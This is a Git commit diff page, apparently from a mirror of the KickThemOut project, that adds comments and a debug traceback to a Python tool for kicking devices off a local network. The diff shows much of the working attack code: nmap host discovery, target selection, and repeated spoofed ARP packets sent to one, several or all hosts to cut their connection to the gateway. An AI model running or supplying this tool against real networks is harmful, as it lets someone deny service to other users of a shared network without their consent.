security-and-privacy/kickthemout
security-and-privacy
/
kickthemout
mirror of https://github.com/k4m4/kickthemout.git
1
0
Fork 0
Code Issues Releases Wiki Activity

Merge pull request #101 from xdavidhu/master 

Added comments and scan info at start
This commit is contained in:
Nikolaos Kamarinakis 2017-04-05 18:47:21 +03:00 committed by GitHub
parent b9beba166c 32541632b1
commit dff6f304cc
3 changed files with 67 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
kickthemout.py
View File

@ -11,10 +11,12 @@ See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
import time, os, sys, logging, math import time, os, sys, logging, math
from time import sleep from time import sleep
import urllib2 as urllib import urllib2 as urllib
import traceback
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
notRoot = False notRoot = False
try: try:
# Check if the user is root
if os.geteuid() != 0: if os.geteuid() != 0:
print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END) print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END)
notRoot = True notRoot = True
@ -34,7 +36,9 @@ except:
raise SystemExit raise SystemExit
def heading(): def heading():
sys.stdout.write(GREEN + """ # Function for printing the logo & info
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
@ -48,6 +52,7 @@ def heading():
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86)) '\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86))
def optionBanner(): def optionBanner():
# Function for printing the list of available commands
print('\nChoose option from menu:\n') print('\nChoose option from menu:\n')
sleep(0.2) sleep(0.2)
print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE) print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE)
@ -59,6 +64,7 @@ def optionBanner():
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def runDebug(): def runDebug():
# Function for printing values & variables for debug
print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END) print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END)
print( print(
"{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format( "{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format(
@ -83,11 +89,18 @@ def runDebug():
print hostsList print hostsList
except: except:
print ("Failed to print hostsList array...") print ("Failed to print hostsList array...")
try:
print ("Crash trace: ")
print(traceback.format_exc())
except:
print ("Failed to print crash trace...")
print ("DEBUG FINISHED.\nShutting down...") print ("DEBUG FINISHED.\nShutting down...")
print("{0}").format(END) print("{0}").format(END)
raise SystemExit raise SystemExit
def regenOnlineIPs(): def regenOnlineIPs():
# Function for regenerating the onlineIPs array (made from the hostsLists array from the scan,
# but only with the IP's in it) and setting gateway's IP, and checking if its mac address is set
global onlineIPs global onlineIPs
global defaultGatewayMac global defaultGatewayMac
global defaultGatewayMacSet global defaultGatewayMacSet
@ -103,14 +116,17 @@ def regenOnlineIPs():
defaultGatewayMac = host[1] defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "": if not defaultGatewayMacSet and defaultGatewayMac == "":
# Ask for the gateway's mac address if scapy failed to detect it
print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = raw_input(header) defaultGatewayMac = raw_input(header)
defaultGatewayMacSet = True defaultGatewayMacSet = True
def scanNetwork(): def scanNetwork():
# Function for scanning the network with the 'scan.py'
global hostsList global hostsList
try: try:
# Passing the network variable to the scan with the 'True' setting of the getDefaultInterface
hostsList = scan.scanNetwork(getDefaultInterface(True)) hostsList = scan.scanNetwork(getDefaultInterface(True))
except KeyboardInterrupt: except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END) print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END)
@ -118,14 +134,17 @@ def scanNetwork():
except: except:
print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END) print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END)
raise SystemExit raise SystemExit
# onlineIPs also get regenerated after every scan
regenOnlineIPs() regenOnlineIPs()
def kickoneoff(): def kickoneoff():
# kickoneoff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -137,6 +156,7 @@ def kickoneoff():
canBreak = False canBreak = False
while not canBreak: while not canBreak:
# Get the input for which IP to target
try: try:
choice = int(raw_input("\nChoose a target: ")) choice = int(raw_input("\nChoose a target: "))
one_target_ip = onlineIPs[choice] one_target_ip = onlineIPs[choice]
@ -146,6 +166,7 @@ def kickoneoff():
except: except:
print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END) print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END)
# Get the mac address of the IP by looping trough the hostList array
one_target_mac = "" one_target_mac = ""
for host in hostsList: for host in hostsList:
if host[0] == one_target_ip: if host[0] == one_target_ip:
@ -159,13 +180,16 @@ def kickoneoff():
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
while True: while True:
# Send a malicious ARP packet in every 10 second
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(10) time.sleep(10)
except KeyboardInterrupt: except KeyboardInterrupt:
# Re-arp on KeyboardInterrupt
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
try: try:
# Send 10 ARP packets with real information to restore the connections
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt: except KeyboardInterrupt:
pass pass
@ -177,11 +201,13 @@ def kickoneoff():
def kicksomeoff(): def kicksomeoff():
# kicksomeoff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -193,6 +219,7 @@ def kicksomeoff():
canBreak = False canBreak = False
while not canBreak: while not canBreak:
# Get the input for which IPs to target
try: try:
choice = raw_input("\nChoose devices to target(comma-separated): ") choice = raw_input("\nChoose devices to target(comma-separated): ")
if ',' in choice: if ',' in choice:
@ -203,6 +230,7 @@ def kicksomeoff():
except KeyboardInterrupt: except KeyboardInterrupt:
return return
# Create a string list of the IPs to print it out later
some_ipList = "" some_ipList = ""
for i in some_targets: for i in some_targets:
try: try:
@ -214,11 +242,13 @@ def kicksomeoff():
return return
some_ipList = some_ipList[:-2] + END some_ipList = some_ipList[:-2] + END
# Print the string IP list
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END) print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
while True: while True:
# Send [number of targets] malicious ARP packet in every 10 second
for i in some_targets: for i in some_targets:
ip = onlineIPs[int(i)] ip = onlineIPs[int(i)]
for host in hostsList: for host in hostsList:
@ -226,9 +256,11 @@ def kicksomeoff():
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
time.sleep(10) time.sleep(10)
except KeyboardInterrupt: except KeyboardInterrupt:
# Re-arp on KeyboardInterrupt
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
# Send 10 ARP packets with real information to restore the connections to every target
for i in some_targets: for i in some_targets:
ip = onlineIPs[int(i)] ip = onlineIPs[int(i)]
for host in hostsList: for host in hostsList:
@ -244,11 +276,13 @@ def kicksomeoff():
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def kickalloff(): def kickalloff():
# kickalloff function, launched if the user selects the number for this from the optionBanner
os.system("clear||cls") os.system("clear||cls")
print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END) print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork() scanNetwork()
# Print the list of online IP's with vendors
print("Online IPs: ") print("Online IPs: ")
for i in range(len(onlineIPs)): for i in range(len(onlineIPs)):
mac = "" mac = ""
@ -260,10 +294,13 @@ def kickalloff():
print("\n{0}Spoofing started... {1}").format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END)
try: try:
# Send [number of hosts in hostsList array] malicious ARP packet in every 10 second
reScan = 0 reScan = 0
while True: while True:
for host in hostsList: for host in hostsList:
# Loop trough hostsList array
if host[0] != defaultGatewayIP: if host[0] != defaultGatewayIP:
# Only sent the packet if the target is not the gateway
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
reScan += 1 reScan += 1
if reScan == 4: if reScan == 4:
@ -274,9 +311,11 @@ def kickalloff():
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1 reArp = 1
while reArp != 10: while reArp != 10:
# Send 10 ARP packets with real information to restore the connections to every target
for host in hostsList: for host in hostsList:
if host[0] != defaultGatewayIP: if host[0] != defaultGatewayIP:
try: try:
# Only sent the packet if the target is not the gateway
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt: except KeyboardInterrupt:
pass pass
@ -287,6 +326,7 @@ def kickalloff():
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def getDefaultInterface(returnNet=False): def getDefaultInterface(returnNet=False):
# Function for getting the default network interface of the machine with scapy
def long2net(arg): def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF): if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg)) raise ValueError("illegal netmask value", hex(arg))
@ -299,6 +339,7 @@ def getDefaultInterface(returnNet=False):
return None return None
return net return net
for network, netmask, _, interface, address in scapy.config.conf.route.routes: for network, netmask, _, interface, address in scapy.config.conf.route.routes:
# Loop trough ip addresses, skip if local
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue continue
if netmask <= 0 or netmask == 0xFFFFFFFF: if netmask <= 0 or netmask == 0xFFFFFFFF:
@ -308,21 +349,25 @@ def getDefaultInterface(returnNet=False):
continue continue
if net: if net:
if returnNet: if returnNet:
# Returning network if the returnNet is set to True (for the network scan)
return net return net
else: else:
return interface return interface
def getGatewayIP(): def getGatewayIP():
# Function for getting the IP of the gateway with scapy
try: try:
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway_p.src return getGateway_p.src
except: except:
# Ask for the gateway ip address if scapy failed to detect it
print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END) print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
gatewayIP = raw_input(header) gatewayIP = raw_input(header)
return gatewayIP return gatewayIP
def getDefaultInterfaceMAC(): def getDefaultInterfaceMAC():
# Function for getting the mac address of the default interface
try: try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface) defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac: if defaultInterfaceMac == "" or not defaultInterfaceMac:
@ -335,13 +380,16 @@ def getDefaultInterfaceMAC():
else: else:
return defaultInterfaceMac return defaultInterfaceMac
except: except:
# Ask for the mac address if scapy failed to detect it
print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header) defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac return defaultInterfaceMac
def resolveMac(mac): def resolveMac(mac):
# Function for resolving mac addresses to vendor names
try: try:
# Sending web request to macvendors.co
url = "http://macvendors.co/api/vendorname/" url = "http://macvendors.co/api/vendorname/"
request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"}) request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"})
response = urllib.urlopen(request) response = urllib.urlopen(request)
@ -354,20 +402,23 @@ def resolveMac(mac):
def main(): def main():
# Print the KickThemOut logo
heading() heading()
print( print(
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}" "\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, + defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
RED, GREEN, RED, GREEN, END) RED, GREEN, RED, GREEN, END)
# Print warnings if there are no hosts up
if len(hostsList) == 0 or len(hostsList) == 1: if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1: if len(hostsList) == 1:
if hostsList[0][0] == defaultGatewayIP: if hostsList[0][0] == defaultGatewayIP:
# If gateway found by the scan
print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format( print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format(
GREEN, RED, GREEN, RED, GREEN, END) GREEN, RED, GREEN, RED, GREEN, END)
raise SystemExit raise SystemExit
else: else:
# If no gateway or host found by the scan
print( print(
"\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format( "\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format(
GREEN, RED, GREEN, RED, GREEN, END) GREEN, RED, GREEN, RED, GREEN, END)
@ -378,13 +429,17 @@ def main():
try: try:
# Getting user input with while loop
while True: while True:
# Print menu items
optionBanner() optionBanner()
# Get user input
header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
choice = raw_input(header) choice = raw_input(header)
# Handling the input
if choice.upper() == 'E' or choice.upper() == 'EXIT': if choice.upper() == 'E' or choice.upper() == 'EXIT':
print('\n{0}Thanks for dropping by.' print('\n{0}Thanks for dropping by.'
'\nCatch ya later!{1}').format(GREEN, END) '\nCatch ya later!{1}').format(GREEN, END)
@ -400,17 +455,24 @@ def main():
else: else:
print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END) print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END)
# Stopping loop on KeyboardInterrupt
except KeyboardInterrupt: except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.' print('\n\n{0}Thanks for dropping by.'
'\nCatch ya later!{1}').format(GREEN, END) '\nCatch ya later!{1}').format(GREEN, END)
if __name__ == '__main__': if __name__ == '__main__':
# -- Start point --
# Setting the network info variables
sys.stdout.write("{0}Scanning your network, hang on...{1}\r".format(GREEN, END))
sys.stdout.flush()
defaultInterface = getDefaultInterface() defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP() defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = getDefaultInterfaceMAC() defaultInterfaceMac = getDefaultInterfaceMAC()
global defaultGatewayMacSet global defaultGatewayMacSet
defaultGatewayMacSet = False defaultGatewayMacSet = False
# Scanning network for the first time
scanNetwork() scanNetwork()
main() main()

2
scan.py
View File

@ -4,6 +4,7 @@
# authors: k4m4 & xdavidhu # authors: k4m4 & xdavidhu
def scanNetwork(network): def scanNetwork(network):
# Function for performing a network scan with nmap with the help of the python-nmap module
returnlist = [] returnlist = []
import nmap import nmap
nm = nmap.PortScanner() nm = nmap.PortScanner()
@ -16,4 +17,5 @@ def scanNetwork(network):
except: except:
pass pass
# returnlist = hostsList array
return returnlist return returnlist

1
spoof.py
View File

@ -19,6 +19,7 @@ from scapy.all import (
) )
def sendPacket(my_mac, gateway_ip, target_ip, target_mac): def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
# Function for sending the malicious ARP packets out with the specified data
ether = Ether() ether = Ether()
ether.src = my_mac ether.src = my_mac